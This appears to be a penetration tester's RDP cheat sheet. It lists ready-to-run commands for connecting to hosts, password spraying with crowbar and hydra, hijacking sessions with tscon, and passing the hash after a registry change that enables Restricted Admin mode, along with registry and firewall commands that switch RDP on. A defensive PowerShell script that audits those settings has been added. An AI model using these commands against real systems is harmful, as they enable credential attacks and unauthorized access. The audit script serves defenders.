RDP
ABOUT
Remote Desktop Protocol (RDP) is a protocol developed by Microsoft for remote access to a computer running the Windows OS. It transmits GUI display and control commands, encrypted, over IP networks. It works at the Application Layer of the TCP/IP model, typically on port TCP/3389, and uses TLS/SSL. If Network Address Translation (NAT) is used on the route between client and server, as is often the case with Internet connections, the client needs the server's public IP address to reach it.
CONNECTING
Rdesktop
rdesktop -u venator17 -p 'amogus' -d domain.kek 13.13.13.13
Xfreerdp
Regular
xfreerdp /u:venator17 /p:amogus /v:13.13.13.13 /d:domain.kek /cert:ignore
With Port-Forwarding
xfreerdp /u:venator17 /p:amogus /v:localhost:3389 /d:domain.kek /cert:ignore
Mounting a local dir
xfreerdp /v:13.13.13.13 /u:venator17 /p:amogus /drive:share,/home/venator17/Assessment123
Remmina (GUI)
remmina
PASSWORD SPRAYING
Crowbar
crowbar -b rdp -s 13.13.13.13/32 -U users.txt -c 'amogus'
Hydra
hydra -L users.txt -p 'amogus' 13.13.13.13 rdp
SESSION HIJACKING
We need SYSTEM privileges and use tscon.exe (which allows connecting to another desktop session):
tscon 13 /dest:V17
PASS-THE-HASH
By default, Windows has Restricted Admin Mode disabled, and we need to change that by setting the DisableRestrictedAdmin registry value to 0:
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Then use xfreerdp for Pass-the-Hash:
xfreerdp /v:13.13.13.13 /u:venator17 /pth:12379NSKDFKSJDF20931C031
ENABLE FROM SYSTEM
As an example, one time I needed to access an internal host, so it was good to turn on RDP and set up port forwarding. So here are the steps to do it.
Change the fDenyTSConnections registry key, which denies RDP connections:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# OR the same thing with PowerShell, for convenience
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -Value 0
Change the firewall rule group to allow RDP connections through:
netsh advfirewall firewall set rule group='remote desktop' new enable=yes
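The three changes above (fDenyTSConnections, DisableRestrictedAdmin and the "Remote Desktop" firewall group) are exactly what a defender should audit on a host. The following PowerShell script is an added example, not from the original page: it reads those same keys and the firewall group state and flags a host where RDP or Restricted Admin mode has been turned on. Function and field names are my own.

```powershell
# Audit the RDP-related settings this page modifies (added example, not the page's own code).
function Get-RdpExposureReport {
    $tsPath  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $lsaPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

    # fDenyTSConnections: 1 = RDP denied (default), 0 = RDP allowed
    $deny = (Get-ItemProperty -Path $tsPath -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections

    # DisableRestrictedAdmin: absent or 1 = Restricted Admin off (default),
    # 0 = on, which means an NT hash alone is enough to log in over RDP
    $dra = (Get-ItemProperty -Path $lsaPath -Name DisableRestrictedAdmin -ErrorAction SilentlyContinue).DisableRestrictedAdmin

    # The rule group that "netsh advfirewall firewall set rule group='remote desktop' new enable=yes" switches on
    $fwEnabled = Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue |
        Where-Object { $_.Enabled -eq 'True' }

    # Is anything actually listening on the default RDP port right now?
    $listener = Get-NetTCPConnection -LocalPort 3389 -State Listen -ErrorAction SilentlyContinue

    [PSCustomObject]@{
        RdpAllowed         = ($deny -eq 0)
        RestrictedAdminOn  = ($dra -eq 0)
        FirewallRdpRulesOn = ($null -ne $fwEnabled)
        ListeningOn3389    = ($null -ne $listener)
    }
}

$report = Get-RdpExposureReport
$report | Format-List

if ($report.RestrictedAdminOn) {
    Write-Warning 'DisableRestrictedAdmin = 0: Restricted Admin mode is enabled, pass-the-hash over RDP is possible.'
}
if ($report.RdpAllowed -and $report.FirewallRdpRulesOn) {
    Write-Warning 'fDenyTSConnections = 0 and the Remote Desktop firewall group is enabled: RDP is reachable.'
}
```

Run it from an elevated PowerShell session; a host that should not offer RDP and reports RdpAllowed or RestrictedAdminOn as True deserves a closer look at who changed those values.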
Tips2Hack
Nmap RDP Scan
nmap -sV -sC 13.13.13.13 -p3389 --script rdp*
RDP Security Check
./rdp-sec-check.pl 13.13.13.13